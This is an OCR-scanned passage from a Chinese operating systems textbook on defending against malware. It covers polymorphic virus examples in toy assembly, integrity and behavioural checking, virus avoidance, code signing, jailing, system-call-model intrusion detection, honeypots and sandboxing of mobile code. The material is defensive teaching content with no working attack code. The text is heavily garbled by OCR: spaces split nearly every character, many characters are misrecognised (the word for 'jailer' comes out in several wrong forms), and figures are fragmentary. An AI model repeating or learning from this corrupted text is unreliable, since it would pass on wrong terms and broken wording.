MOV A,R1 
TST R1 
ADD C,R1 


MOV R1,X 


NOP 
SUB #4,R1 
NOP 
MOV R1,X 


SHL #0,R1 SHL R1,0 
SUB #4,R1 SUB #4,R1 
JMP .+1 ADD R5,R5 
MOV R1,X MOV R1,X 
MOV R5,Y 


MOV R1,X 
MOV R5,Y 





b) c) d) 


图 9-34 多 形态 病毒 的 实例 


要 求 较 差 的 反 病 毒 软件 意识 到 图 9-34a 至 图 9-34e 具 有 相同 的 代码 功能 是 相当 困难 的 ， 特 别 是 当 变异 
引擎 有 能 力 “ 狐 免 三 定 ” 时 。 反 病毒 软件 可 以 分 析 病 毒 代码 ， 了 解 病 毒 原理 ， 甚 至 可 以 试图 模拟 代码 操 
作 , 但 我 们 必须 记 住 有 成 千 上 万 的 病毒 和 成 千 上 万 的 文件 需要 分 析 ， 所 以 每 次 测试 不 能 花费 太 多 的 时 间 ， 
否则 运行 起 来 会 惊人 地 慢 。 

另外 ， 储 存在 变量 Y 里 的 值 是 为 了 让 人 们 难以 发 现 与 R5 有 关 的 代码 是 死 码 的 事实 ， 死 码 不 会 做 任何 
事情 。 如 果 其 他 代码 段 对 Y 进 行 了 读 写 ， 代 码 就 会 看 上 去 十 分 合法 。 一 个 写 得 十 分 好 的 变异 引擎 代码 会 
产生 极 强 的 变种 ， 会 给 反 病 毒 软件 的 作者 带 来 焉 梦 般 的 麻烦 。 唯 一 让 人 安慰 的 是 这 样 的 引擎 很 难 编写 ， 
所 以 Virgil 的 朋友 都 使 用 他 的 代码 ， 结 果 在 病毒 界 里 并 没有 种 类 繁多 的 变异 引擎 。 

到 目前 为 止 ， 我 们 讨论 的 是 如 何 识 别 被 感染 的 可 执行 文件 里 的 病毒 。 而 且 ， 反 病毒 扫描 器 必须 检查 
MBR、 引 导 遍 区 、 坏 扇 区 列表 、 闪 速 ROM、CMOS 等 区 域 。 但 是 如 果 有 内 存 驻 留 病毒 在 运行 会 怎样 
WE? 该 内 存 驻 留 病毒 不 会 被 发 现 。 更 粳 的 是 假设 运行 的 病毒 正在 控制 所 有 的 系统 调用 ， 它 就 能 轻易 地 控 
测 到 反 病 毒 程 序 正在 读 引导 扇 区 〈 用 以 查找 病毒 )。 为 了 阻止 反 病 毒 程 序 ， 病 毒 进 行 系统 调用 ， 相 反 它 
把 真正 的 引导 区 从 坏 扇 区 列表 的 藏身 之 地 返回 。 它 也 可 以 作 记录 ， 在 被 扫描 器 检查 以 后 会 再 次 感染 所 有 
的 文件 。 

为 了 防止 被 病毒 欺骗 ， 反 病毒 程序 也 可 以 会 跳 过 操作 系统 直接 去 读物 理 磁盘 。 不 过 这 样 做 需要 具有 
用 于 IDE、SCSI 和 其 他 种 类 硬盘 的 内 置 设备 驱动 程序 ， 这 样 会 降低 反 病 毒 程 序 的 可 移植 性 ， 遇 到 不 通用 
的 硬盘 就 会 一 筹 莫 展 。 而 且 ， 跳 过 操作 系统 来 读 取 引 导 扇 区 是 可 以 的 ， 但 是 跳 过 操作 系统 来 读 取 所 有 的 
可 执行 文件 却 是 不 可 能 的 ， 所 以 仍然 存在 病毒 产生 出 与 可 执行 文件 相关 的 欺骗 性 数据 的 危险 。 

2. 完整 性 检查 程序 

另 一 种 完全 不 同 的 病毒 检测 方法 是 实施 完整 性 检查 (integrity checking)。 采 用 这 种 方法 的 反 病毒 程 
序 首先 扫描 硬盘 上 的 病毒 ， 一 旦 确信 硬盘 是 干净 的 ， 它 就 开始 为 每 个 可 执行 文件 计算 一 个 校 验 和 。 计 算 
校 验 和 的 算法 应 该 是 很 简单 的 ， 就 像 把 程序 段 中 的 所 有 字 作 为 32 位 或 者 64 位 整数 加 起 来 求 和 一 样 简单 ， 
但 是 这 种 算法 也 要 像 加 密 的 散 列 算法 一 样 ， 是 不 可 能 逆向 求解 的 。 然 后 ， 要 把 一 个 目录 中 的 所 有 相关 文 
件 的 校 验 和 写 到 一 个 文件 中 去 。 下 一 次 运行 的 时 候 ， 程 序 重新 计算 校 验 值 ， 看 是 否 与 校 验 和 文件 里 的 值 
相 匹配 。 这 样 被 感染 的 文件 会 立刻 被 查 出 。 

问题 在 于 Virgil 并 不 愿意 让 病毒 被 查 出 ， 他 可 以 写 一 段 病毒 代码 把 校 验 和 文件 移 走 。 更 糟 的 是 ， 他 
可 以 计算 已 感染 病毒 的 文件 校 验 值 ， 用 这 一 值 替代 校 验 和 文件 里 的 正常 值 。 为 了 保护 校 验 值 不 被 更 改 ， 
反 病 毒 程序 可 以 尝试 把 该 文件 藏 起 来 ， 但 对 长 时 间 研 究 反 病 毒 程序 的 Virgil 来 说 ， 这 种 方法 也 难以 奏效 。 
比较 好 的 方法 是 对 文件 加 密 以 便 使 得 其 上 的 破坏 容易 被 发 现 。 理 想 状态 是 加 密 采 用 了 智能 卡 技术 ， 加 密 
密 钥 被 放 在 芯片 里 使 得 程序 无 法 读 到 。 
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3. 行为 检查 程序 

第 三 种 反 病毒 程序 使 用 的 方法 是 实施 行为 检查 (behavioral checking)。 通 过 这 种 方法 ， 反 病毒 程序 
在 系统 运行 时 驻 留 在 内 存 里 ， 并 自己 捕捉 所 有 的 系统 调用 。 这 一 方法 能 够 监视 所 有 的 系统 活动 ， 并 试图 
捕捉 任何 可 能 被 人 怀疑 的 行为 。 例 如 ， 通 常 没 有 程序 会 覆盖 引导 遍 区 ， 所 以 有 这 种 企图 的 程序 几乎 可 以 肯 
定 是 病毒 。 同 理 ， 改 变 闪 速 ROM 的 内 容 也 值得 怀疑 。 

但 是 也 有 些 情况 比较 难以 判断 。 例 如 ， 覆 盖 可 执行 文件 是 一 个 特殊 的 操作 ， 除 非 是 编译 器 。 如 果 反 
病毒 程序 检测 到 了 这 样 一 个 写 的 动作 并 发 出 了 警告 ， 它 希望 用 户 能 根据 当时 情形 决定 是 否 要 覆盖 可 执行 
文件 。 同 样 ， 当 Word 用 一 个 全 是 宏 的 新 文件 重 写 .doc 文 件 时 不 一 定 是 病毒 的 杰作 。 在 Windows 中 程序 可 
以 从 可 执行 文件 里 分 离 出 来 ， 并 使 用 特殊 的 系统 调用 驻 留 内 存 。 当 然 ， 这 也 可 能 是 合法 的 ， 但 是 给 出 警 
告 还 是 十 分 有 用 的 。 

病毒 并 不 会 被 动 地 等 着 反 病 毒 程序 杀 死 自己 ， 它 们 也 会 反击 。 一 场 特别 有 趣 的 战斗 会 发 生 在 内 存 驻 
留 病毒 和 内 存 驻 留 反 病毒 程序 之 间 。 多 年 以 前 ， 有 一 个 叫 作 Core Wars 的 游戏 ， 在 游戏 里 两 个 程序 员 各 
自 放 置 程序 到 空余 的 地 址 空间 里 。 程 序 依次 抢夺 内 存 ， 目 的 是 把 对 手 的 程序 清理 出 去 来 扩大 自己 的 地 盘 。 
病毒 与 反 病毒 程序 之 间 的 战斗 就 有 点 像 这 个 游戏 ， 而 战场 转换 到 了 那些 并 不 希望 战斗 发 生 的 受害 者 的 机 
器 里 。 更 糟 的 是 ， 病 毒 有 一 个 优势 ， 它 可 以 去 买 反 病毒 软件 来 了 解 对 手 。 当 然 ， 一 旦 病毒 出 现 ， 反 病毒 
小 组 也 会 修改 软件 ， 从 而 逼迫 Virgil 不 得 不 再 买 新 的 版 本 。 

4. 病毒 避免 

每 一 个 好 的 故事 都 需要 理念 。 这 里 的 理念 是 : 

与 其 遗憾 不 如 尽量 安全 ， 即 有 备 无 患 。 

避免 病毒 比 起 在 计算 机 感染 后 去 试图 追踪 它们 要 容易 得 多 。 下 面 是 一 些 个 人 用 户 的 使 用 指南 ， 这 也 
是 整个 产业 界 为 减轻 病毒 问题 所 做 的 努力 。 

用 户 该 怎样 做 来 避免 病毒 感染 呢 ? 第 一 ， 选 择 能 提供 高 度 安 全 保障 的 操作 系统 ， 这 样 的 系统 应 该 拥 
有 强大 的 核心 -用 户 态 边 界 ， 分 离 提供 每 个 用 户 和 系统 管理 员 的 登录 密码 。 在 这 些 条 件 下 ， 溜 进来 的 病 
毒 无 法 感染 系统 代码 。 

第 二 ， 仅 安装 从 可 靠 的 供应 商 处 购买 的 最 小 配置 的 软件 。 有 了 时， 即使 这 样 也 不 能 保证 有 些 软件 公司 
雇员 会 在 商业 软件 产品 里 放置 病毒 ， 但 这 样 做 会 有 较 大 的 帮助 。 从 Web 站 点 和 公告 板 下 载 软件 是 十 分 冒 
险 的 行为 。 

第 三 ， 购 买 性 能 良好 的 反 病毒 软件 并 按 指定 要 求 使 用 。 确 保 能 够 经 常 从 厂商 站 点 下 载 更 新 版 本 。 

第 四 ， 不 要 点 击 电子 邮件 里 的 附件 ， 告 诉 他 人 不 要 发 送 附件 给 自己 。 使 用 简明 ASCII 文 本 的 邮件 比 
较 安 全 ， 而 附件 在 打开 时 可 能 会 启动 病毒 程序 。 

第 五 ， 定 期 将 重要 文件 备份 到 外 部 存储 介质 ， 如 软磁盘 、CD-R 或 磁带 等 。 在 一 系列 的 备份 介质 中 
应 该 保存 不 同 的 版 本 。 这 样 ， 当 发 现 病毒 时 就 有 机 会 还 原 被 感染 前 的 文件 。 例 如 ， 假 设 还 原 昨天 已 被 感 
染 的 备份 版 本 不 成 功 的 话 ， 还 原 上 一 周 的 版 本 也 许 会 有 用 。 

最 后 一 点 ， 抵 抗 住 诱惑 ， 不 要 从 一 个 不 了 解 的 地 方 下 载 并 运行 那些 吸引 人 的 新 免费 软件 。 或 许 这 些 
”软件 免费 的 原因 是 : 它 的 制造 者 想 让 你 的 机 器 加 入 他 的 僵尸 机 器 的 大 军 中 来 。 然 而 ， 如 果 你 有 虚拟 机 软 
件 的 话 ， 在 虚拟 机 中 运行 这 些 不 了 解 的 软件 是 安全 的 。 

整个 业界 应 该 重视 病毒 并 改变 一 些 危 险 的 做 法 。 第 一 ， 制 造 简单 的 操作 系统 。 铃 声 和 口哨 声 越 多 ， 
安全 漏洞 也 越 多 ， 这 就 是 现实 。 

第 二 ， 不 要 使 用 动态 文本 。 从 安全 角度 来 说 ,动态 文本 是 可 怕 的 。 浏 览 别人 提供 的 文档 时 最 好 不 要 
运行 别人 提供 的 程序 。 例 如 ，JPEG 文 件 就 不 包含 程序 ， 所 以 也 就 不 会 含有 病毒 。 所 有 的 文档 都 应 该 以 
这 样 的 方式 工作 。 

第 三 ， 应 该 采取 措施 将 重要 的 磁盘 柱 面 有 选择 性 地 写 保 护 ， 防 止 病毒 感染 程序 。 这 种 方法 必须 在 控 
制 器 内 部 放置 位 图 说 明 ， 位 图 里 含有 受 保护 磁盘 柱 面 的 分 布 图 。 只 有 当 用 户 拨 动 了 计算 机 面板 上 的 机 械 
拨 动 开关 后 ， 位 图 才能 够 被 改动 。 

第 四 ， 使 用 闪存 是 个 好 主意 ， 但 只 有 用 户 拨 动 了 外 部 开关 后 才能 被 改动 ， 如 当 用 户 有 意识 地 安装 
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BIOS 升 级 程序 的 时 候 。 当 然 ， 所 有 这 些 措 施 在 没有 遭受 病毒 的 强烈 攻击 时 ， 是 不 会 引起 重视 的 。 例 如 ， 
有 些 病毒 会 攻击 金融 领域 ， 把 所 有 银行 账户 的 金额 重 置 为 0。 当 然 ， 那 时 候 再 采取 措施 就 太 晚 了 。 


9.10.3 代码 签名 

一 种 完全 不 同 的 防止 恶意 软件 的 方法 (全面 防御 )， 是 我 们 只 运行 那些 来 自 可 靠 的 软件 厂商 的 没有 
被 修改 过 的 软件 。 马 上 我 们 会 问 ， 用 户 如 何 知 道 软件 的 确 是 来 自 它 自己 所 声称 的 厂商 ， 并 且 用 户 又 如 何 
知道 软件 从 它 被 生产 之 后 没有 被 修改 过 呢 。 当 我 们 从 一 个 名 声 未 知 的 在 线 商 店 中 下 载 软件 或 者 从 站 点 下 
载 ActiveX 控 件 的 时 候 ， 这 个 问题 就 显得 格外 重要 。 例 如 ， 如 果 ActiveX 控 件 来 自 一 个 著名 的 软件 公司 ， 
那么 它 几乎 不 可 能 包含 一 个 木马 程序 ， 但 是 ， 用 户 如 何 确信 这 一 点 呢 ? 

一 种 被 广泛 应 用 的 解决 办 法 是 数字 签名 ， 这 部 分 内 容 在 9.5.4 节 中 已 经 讲解 过 。 如 果 用 户 只 运行 那些 
由 可 信 的 地 方 制造 并 签名 的 程序 、 插 件 、 驱 动 、ActiveX 控 件 以 及 其 他 软件 ， 那 么 陷入 麻烦 的 机 会 就 会 
少 得 多 。 但 是 这 样 做 导致 的 后 果 就 是 ， 那 些 来 自 于 Snarky Software 的 新 的 、 免 费 的 、 好 玩 的 、 花 哨 的 游 
戏 可 能 非常 不 错 但 是 不 会 通过 数字 签名 的 检查 ， 因 为 你 不 知道 谁 制造 了 他 们 。 

代码 签名 法 是 基于 公 钥 密码 体系 。 如 某 个 软件 厂商 产生 了 一 对 密 钥 ( 公 钥 和 私 钥 ) ， 将 公 钥 公开 ， 
私 钥 妥善 保存 。 为 了 完成 对 一 个 软件 签名 ， 供 应 商 首先 将 代码 进行 散 列 函数 运算 ， 得 到 128 位 (采用 
MD5 算 法 )、160 位 (采用 SHA-1 算 法 ) 或 256 位 (采用 SHA-256 算 法 ) 的 值 。 然 后 通过 私 钥 加 密 取 得 散 
列 值 的 数字 签名 (实际 上 ， 在 使 用 时 如 图 9-3 所 示 进 行 了 解密 )。 这 个 数字 签名 则 始终 伴随 着 这 个 软件 。 

当 用 户 得 到 这 个 软件 后 ， 计 算出 散 列 函 数 并 保存 结果 ， 然 后 将 附带 的 数字 签名 用 公 钥 进行 解密 。 接 
着 ， 核 对 解密 后 的 散 列 函数 值 同 自己 运算 出 的 值 是 否 相 等 。 如 果 相 等 ， 这 个 软件 就 被 接受 ， 否 则 就 作为 
伪造 版 本 被 拒绝 。 这 里 所 用 到 的 数学 方法 使 得 任何 想 要 自 改 软件 的 人 十 分 难以 得 手 ， 因 为 这 个 散 列 函 数 
要 同 从 真正 的 数字 签名 中 解密 出 来 的 散 列 函数 匹配 。 在 没有 私 钥 的 情况 下 通过 产生 匹配 的 假 数字 签名 是 
十 分 困难 的 。 签 名 和 校 验 的 过 程 如 图 9-35 所 示 。 


软件 供应 商 产生 签名 用 户 


H = hash (Program) 
Signature = encrypt(H) 


验证 签名 
H1 = hash (Program) 
H2 = decrypt(Signature) 


如 果 H1 = H2， 则 接受 程序 











图 9-35 代码 签名 的 工作 原理 


网 页 能 够 包含 代码 ， 比 如 ActiveX 控 件 ， 以 及 各 种 脚本 语言 写 出 的 代码 。 通 常 这 些 代 码 会 被 签名 ， 
而 浏览 器 会 自动 地 检查 这 些 签名 。 当 然 ， 为 了 验证 签名 ;浏览 器 需要 软件 厂商 的 公 钥 ， 它 们 通常 和 代码 
在 一 起 。 和 公 钥 一 起 的 还 有 被 某 个 CA 签名 过 的 证 书 。 如 果 浏 览 器 已 经 保存 了 这 个 CA 的 公 角 的话 ， 它 可 
以 自己 验证 这 个 证 书 。 如 果 这 个 证 书 是 被 浏览 器 所 不 知道 的 某 个 CA 签名 的 话 ， 那 么 它 会 弹出 一 个 对 话 
框 询问 是 否 接受 这 个 证 书 。 
9.10.4 囚禁 

一 个 古老 的 俄国 谚语 说 :“ 相 信 但 需要 验证 。” 
很 明显 地 ， 古 代 的 俄国 人 在 头脑 中 就 已 经 清楚 地 有 
了 软件 的 概念 。 即 使 一 个 软件 已 经 被 签名 了 ， 一 个 
好 的 态度 是 去 核实 它 是 否 都 能 正常 运行 。 做 这 件 事 
情 的 一 种 技术 是 囚禁 (jailing)， 如 图 9-36 所 示 。 

如 图 9-36， 一 个 新 被 接受 的 程序 会 作为 一 个 标 
有 “囚犯 ”的 标签 的 进程 来 运行 。 这 个 “ 狱 卒 ”是 图 9-36 囚禁 的 操作 过 程 
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一 个 可 信任 的 《系统 的 ) 进程 ， 可 以 监管 因 犯 进程 的 行为 。 当 一 个 被 监禁 的 进程 作出 一 个 系统 调用 的 时 
候 ， 系 统 调用 不 会 执行 ， 而 是 把 控制 移交 给 狱 座 进程 (通过 一 个 内 核 陷 入 ) 并 把 系统 调用 号 和 参数 传递 
给 它 。 这 个 狼 卒 进程 会 判断 是 否 这 个 系统 调用 被 允许 。 例 如 ， 如 果 被 监禁 的 进程 试图 和 一 个 狱 卒 进程 不 
知道 的 远程 主机 建立 一 个 网 络 连接 ， 这 个 系统 调用 会 被 拒绝 然后 该 因 犯 进程 被 结束 。 如 果 这 个 系统 调用 
是 可 以 接受 的 ， 那 么 狱 卒 进程 会 通知 内 核 , 由 内 核 来 执行 该 系统 调用 。 通 过 使 用 这 种 方法 ， 不 正确 的 行 
为 会 在 它 引 起 麻烦 之 前 被 捕捉 到 。 

囚禁 有 很 多 的 实现 方法 。 有 一 种 方法 可 以 在 不 需要 修改 内 核 的 情况 下 ， 在 几乎 任何 一 个 UNIX 系 统 
上 实现 ， 这 种 方法 是 Van't Noordende 等 人 在 2007 年 提出 的 。 在 nutshell 中 ， 这 个 方法 使 用 普通 的 UNIX 调 
试 功能 ， 让 猴 座 进程 作为 调试 者 而 囚犯 进程 作为 被 调试 者 。 这 种 情况 下 ， 调 试 者 可 以 指示 内 核 把 被 调试 
者 封装 起 来 ， 然 后 把 被 调试 者 的 所 有 系统 调用 都 传递 给 自己 来 监视 。 


9.10.5 基于 模型 的 入 侵 检测 

还 有 一 种 方法 可 以 保护 我 们 的 机 器 ， 那 就 是 安装 一 个 IDS (Intrusion Detection System)。IDS 有 两 
种 基本 的 类 型 ， 一 种 关注 于 监测 进入 电脑 的 网 络 包 ， 另 一 种 关注 寻找 CPU 上 的 异常 情况 。 之 前 在 防火 墙 
的 部 分 我 们 简要 地 提 到 了 网 络 IDS， 现 在 我 们 对 于 基于 主机 的 IDS 进 行 一 些 讲解 。 出 于 篇 幅 限 制 ， 我 们 
不 能 够 审视 全 部 的 种 类 繁多 的 基于 主机 的 IDS。 相 反 地 ， 我 们 选择 一 种 类 型 来 简单 地 了 解 它 们 是 如 何 工 
作 的 。 这 种 类 型 是 基于 静态 模型 的 入 侵 检 测 (Wagner 和 Dean，2001)。 它 可 以 用 上 面 提 到 的 因 禁 技术 来 
实现 ， 同 时 也 有 其 他 的 实现 方法 。 

在 图 9-37a 中 我 们 看 到 了 这 样 一 个 小 程序 ， 它 打开 一 个 叫 data 的 文件 ， 然 后 每 次 一 个 字符 地 读 入 ， 直 
到 遇 到 了 一 个 0 字 节 ， 这 时 打印 出 文件 开始 部 分 的 非 0 字 节 的 个 数 然后 程序 退出 。 在 图 9-37b 中 ， 我 们 看 
到 了 这 个 程序 的 系统 调用 图 (这 里 打印 被 叫 作 write ) 。 


int main(int argc *char argv[]) 


int fd, n = 0; 
char buf[1]; 


fd = open("data", 0); 
if (fd < 0) { 
printf("Bad data file\n"); 
exit(1); 
} else { 
while (1) { 
read(fd, buf, 1); 
if (buf[0] == 0) { 
close(fd); 
printf("n = %d\n", n); 
exit(0); 
} 


n=n+1; 





b) 


图 9-37 a) 程序 ，b) 该 程序 的 系统 调用 图 


这 个 图 告诉 了 我 们 什么 呢 ? 首先 ， 在 任何 情况 下 ， 这 个 程序 的 第 一 个 系统 调用 一 定 是 open。 第 二 个 
系统 调用 是 read 或 者 write ， 这 要 根据 执行 if 语句 的 那个 分 支 来 决定 。 如 果 第 二 个 系统 调用 是 write， 那 么 
就 意味 着 文件 无 法 打开 ， 然 后 下 一 个 系统 调用 必须 是 exit。 如 果 第 二 个 系统 调用 是 read， 那 么 可 能 还 有 额 
外 任意 多 次 的 read 调 用 ， 并 且 最 后 调用 close、write 和 exit。 在 没有 入 侵 的 情况 下 ， 其 他 序列 是 不 可 能 的 。 
如 果 这 个 程序 被 囚禁 ， 那 么 狱 卒 程序 可 以 看 到 所 有 的 系统 调用 并 很 容易 地 验证 某 个 序列 是 不 是 有 效 的 。 

现在 假设 某 人 发 现 了 这 个 程序 的 一 个 错误 (bug) ， 然 后 成 功 地 引起 了 缓冲 区 溢出 ， 插 入 并 执行 了 恶 
意 代码 。 当 恶意 代码 运行 的 时 候 ， 极 大 的 可 能 是 会 执行 一 个 不 同 的 系统 调用 序列 。 例 如 ， 亚 意 代码 可 能 
尝试 打开 某 个 它 想 要 复制 的 文件 或 者 可 能 和 家 里 的 电话 建立 网 络 连接 。 当 第 一 次 出 现 系 统 调用 不 符合 原 
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来 的 模式 时 ， 狱 卒 十 分 肯定 地 认定 出 现 了 攻击 并 会 采取 行动 ,比如 结束 这 个 进程 并 向 系统 管理 员 报警 。 这 样 ， 
入 侵 检 测 系统 就 能 够 在 攻击 发 生 的 时 候 检 查 到 它们 。 静 态 系统 调用 分 析 只 是 很 多 IDS 工 作 方法 中 的 一 种 。 

当 使 用 这 种 基于 静态 模型 的 入 侵 检测 的 时 候 ， 狱 卒 必 须知 道 这 个 模型 (比如 系统 调用 图 ) 。 最 直接 
的 方式 就 是 让 编译 器 产生 它 并 让 程序 的 作者 签名 同时 附 上 它 的 证 书 。 这 样 的 话 ， 任 何 预 先 修改 可 执行 程 
序 的 企图 都 会 被 在 程序 运行 的 时 候 检测 到 ， 因 为 实际 的 行为 和 被 签 过 名 的 预期 行为 不 一 致 。 

很 不 幸 的 是 ， 一 个 聪明 的 攻击 者 可 能 发 动 一 种 叫 作 模仿 攻击 (mimicry attack) 的 攻击 ， 在 这 种 攻 
击 中 播 入 的 代码 会 有 和 该 程序 同样 的 系统 调用 序列 (Wagner 和 Soto，2002) ， 所 以 我 们 需要 更 复杂 的 模 
型 ， 不 能 仅仅 依靠 跟踪 系统 调用 。 然 而 ， 作 为 深层 防御 的 一 部 分 ，IDS 还 是 扮演 着 重要 的 角色 。 

无 论 如 何 ， 基 于 模型 的 IDS 不 仅仅 是 一 种 。 许 多 IDS 利 用 了 一 个 叫 作 窜 缸 (honeypot) 的 概念 ， 这 是 
一 个 吸引 和 捕捉 攻击 者 和 恶意 软件 的 陷阱 。 通 常 守 钠 会 是 一 个 孤立 的 机 器 ， 几 乎 没有 防御 ， 表 面 看 起 来 
令 人 感 兴趣 并 且 有 些 有 价值 的 内 容 ， 像 一 个 成 熟 等 待 采摘 的 果实 一 样 。 设 置 蜜 缸 的 人 会 小 心经 翼 地 监视 
它 上 面 的 任何 攻击 并 尽量 去 了 解 攻击 的 特征 。 一 些 IDS 会 把 蜜 把 放 在 虚拟 机 上 防止 对 下 层 实 际 系统 的 破 
坏 。 所 以 很 自然 地 ， 恶 意 软 件 也 会 像 之 前 提 到 的 那样 努力 检查 自己 是 否 运 行 在 虚拟 机 上 。 


9.10.6 封装 移动 代码 

病毒 和 蠕虫 不 需要 制造 者 有 多 大 学 问 ， 而 且 往 往 会 与 用 户 意 愿 相 反 地 侵入 到 计算 机 中 。 但 有 时 人 们 
也 会 不 经 意 地 在 自己 的 机 器 上 放 入 并 执行 外 来 代码 。 情 况 通 常 是 这 样 发 生 的 : 在 遥远 的 过 去 (在 Internet 
世界 里 ， 代 表 去 年 )， 大 多 数 网 页 是 含有 少量 相关 图 片 的 静态 文件 ， 而 现在 越 来 越 多 的 网 页 包含 了 叫 作 
Applet 的 小 程序 。 当 人 们 下 载 包含 Applet 的 网 页 时 ，Applet 就 会 被 调用 并 运行 。 例 如 ， 某 个 Applet 也 许 
包含 了 需要 填充 的 表格 以 及 交互 式 的 帮助 信息 。 当 表格 填 好 后 会 被 送 到 网 上 的 某 处 进行 处 理 。 税 单 、 客 
户 产品 订单 以 及 许多 种 类 的 表格 都 可 以 使 用 这 种 方法 。 

另 一 个 让 程序 从 一 台 计 算 机 到 另 一 台 计 算 机 上 运行 的 例子 是 代理 程序 (agent) 。 代 理 程序 指 用 户 让 
程序 在 目标 计算 机 上 执行 任务 后 再 返回 报告 。 例 如 ， 要 求 某 个 代理 程序 查看 旅游 网 站 ， 查 找 从 阿 姆 斯 特 
丹 到 旧金山 的 最 便宜 航线 。 代 理 程 序 会 登录 到 每 个 站 点 上 运行 ， 找 到 所 需 的 信息 后 ， 再 前 进 到 下 一 个 站 
点 。 当 所 有 的 站 点 查询 完毕 后 ， 它 返回 原 处 并 报告 结果 。 

第 三 个 移动 代码 的 例子 是 PostScript 文 件 中 的 移动 代码 ， 这 个 文件 将 在 PostScript 打 印 机 上 打印 出 来 。 
一 个 PostScript 文 件 实际 上 是 用 PostScript 语 言 编写 ， 它 可 在 打印 机 里 执行 的 程序 。 它 通常 告诉 打印 机 如 
何 画 某 些 特定 的 曲线 并 加 以 填充 ， 它 也 可 以 做 其 他 任何 想 做 的 事 。Applet、 代 理 和 PostScript 是 移动 代码 
(mobile code) 的 三 个 例子 ， 当 然 还 有 许多 其 他 的 例子 。 

在 前 面 大 篇 幅 讨 论 了 病毒 和 蠕虫 之 后 ， 我 们 很 清楚 地 意识 到 让 外 来 代码 运行 在 自己 的 计算 机 上 多 少 
有 点 冒险 。 然 而 ， 有 些 人 的 确 想 要 运行 外 来 代码 ， 所 以 就 会 产生 问题 :“ 移 动 代码 可 以 安全 运行 吗 ? ” 
简 而 言 之 : 可 以 ， 但 并 不 容易 。 最 基本 的 问题 在 于 当 进程 把 Applet 或 其 他 的 移动 代码 插 人 地 址 空间 并 运 
行 后 ， 这 些 代码 就 成 了 合法 的 用 户 进程 的 一 部 分 ， 并 且 掌 握 了 用 户 所 拥有 的 权限 ， 包 括 对 用 户 的 磁盘 文 
件 进行 读 、 写 、 删 除 或 加 密 ， 把 数据 用 E-mail 发 送 到 其 他 国家 等 。 

很 久 以 前 ， 操 作 系 统 推出 了 进程 的 概念 ， 为 的 是 在 用 户 之 间 建 立 隔 离 墙 。 在 这 一 概念 中 ， 每 个 进程 
都 有 自己 的 保护 地 址 空间 和 UID ， 人 允许 获取 自己 的 文件 和 资源 ， 而 不 能 获取 他 人 的 。 而 对 于 保护 进程 的 
一 部 分 ( 指 Applet) 或 者 其 他 资源 来 说 ， 进 程 概念 也 无 能 为 力 。 线 程 允许 在 一 个 进程 中 控制 多 个 线程 ， 
但 是 单个 线程 与 其 他 线程 之 间 却 没有 提供 保护 。 

从 理论 上 来 说 ， 将 每 个 Applet 作 为 独立 的 进程 运行 只 能 帮 上 一 点 忙 ， 但 缺乏 可 操作 性 。 例 如 ， 某 个 
Web 网 页 包含 了 相互 之 间 互 相 影 响 的 两 个 或 多 个 Applet， 而 数据 在 Web 页 里 。Web 浏 览 器 也 需要 与 Applet 
交互 ， 启 动 或 停止 它们 ， 为 它们 输入 数据 等 。 如 果 每 个 Applet 被 放 在 自己 的 进程 里 ， 就 无 法 进行 任何 操 
作 。 而 且 ， 把 每 个 Applet 放 在 自己 的 地 址 空间 里 并 不 能 保证 Applet 不 窃取 或 损害 数据 。 如 果 有 Applet 想 
这 样 做 是 很 容易 的 ， 因 为 没有 人 在 一 旁 监 视 。 

人 们 还 使 用 了 许多 新 方法 来 对 付 Applet (通常 是 移动 代码 ) 。 下 面 我 们 将 看 看 其 中 的 两 种 方法 : 沙 
盒 法 和 解释 法 。 另 外 ， 代 码 签 名 同样 能 够 用 于 验证 Applet 代 码 。 每 一 种 方法 都 有 自己 的 长 处 和 短处 。 
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1. 沙 盒 法 

第 一 种 方法 叫 作 沙 盒 法 (sandboxing) ， 这 种 方法 将 每 个 运行 的 Applet 限 制 在 一 定 范围 的 有 效 地 址 中 
(Wahbe 等 人 , 1993) 。 它 的 工作 原理 是 把 虚拟 地 址 空间 划 l 
分 为 相同 大 小 的 区 域 ， 每 个 区 域 叫 作 沙 盒 。 每 个 沙 盒 必须 BE 
保证 所 有 的 地 址 共享 高 位 字 节 。 对 32 位 的 地 址 来 说 ,我 们 
可 以 把 它 划分 为 256 个 沙 盒 ， 每 个 沙 盒 有 16MB 空 间 并 共享 
相同 的 高 8 位 。 同 样 ， 我 们 也 可 以 划分 为 512 个 8MB 空 间 的 
沙 盒 ， 每 个 沙 盒 共享 9 位 地 址 前 级。 沙 盒 的 尺寸 可 以 选取 
到 足够 容纳 最 大 的 Applet 而 不 浪费 太 多 的 地 址 空间 。 如 果 
页 面 调用 满足 的 话 ， 物 理 内 存 不 会 成 为 问题 。 每 个 
Applet 拥 有 两 个 沙 盒 ， 一 个 放置 代码 ， 另 一 个 放置 数据 ， 
如 图 9-38a 所 示 的 16 个 16MB 的 沙 盒 。 

沙 盒 的 用 意 在 于 保证 每 个 Applet 不 能 跳 转 到 或 引用 其 他 
的 代码 沙 盒 或 数据 沙 盒 。 提 供 两 个 沙 盒 的 目的 是 为 了 避免 
Applet 在 运行 时 超越 限制 修改 代码 。 通 过 抑制 把 所 有 的 
Applet 放 入 代码 沙 盒 ， 我 们 减少 了 自我 修改 代码 的 危险 。 只 l 
要 Applet 通 过 这 种 方法 受到 限制 ， 它 就 不 能 损害 浏览 器 或 其 ”图 9-38 a) 内 存 被 划分 为 16MB 的 沙 盒 ， 
他 的 Applet， 也 不 能 在 内 存 里 培植 病毒 或 者 对 内 存 造成 损失 。 b) 检查 指令 有 效 性 的 一 种 方法 

只 要 Applet 被 装 人 ， 它 就 被 重新 分 配 到 沙 盒 的 开头 ， 然 后 系统 检查 代码 和 数据 的 引用 是 否 已 被 限制 
在 相应 的 沙 盒 里 。 在 下 面 的 讨论 中 , 我 们 将 看 一 下 代码 引用 (如 JMP 和 CALL 指 令 )， 数据 引用 也 是 如 此 。 
使 用 直接 寻 址 的 静态 JMP 指 令 很 容易 检查 : 目标 地 址 是 否 仍旧 在 代码 沙 盒 里 ?同样 ， 相 对 JMP 指 令 也 很 
容易 检查 。 如 果 Applet 含 有 要 试图 离开 代码 沙 盒 的 代码 ， 它 就 会 被 拒绝 并 不 予 执行 。 同 样 ， 试 图 接触 外 
界 数据 的 Applet 也 会 被 拒绝 。 

最 困难 的 是 动态 JMP。 大 多 数 计算 机 都 有 这 样 一 条 指令 ， 该 指令 中 要 跳 转 的 目标 地 址 在 运行 的 时 候 
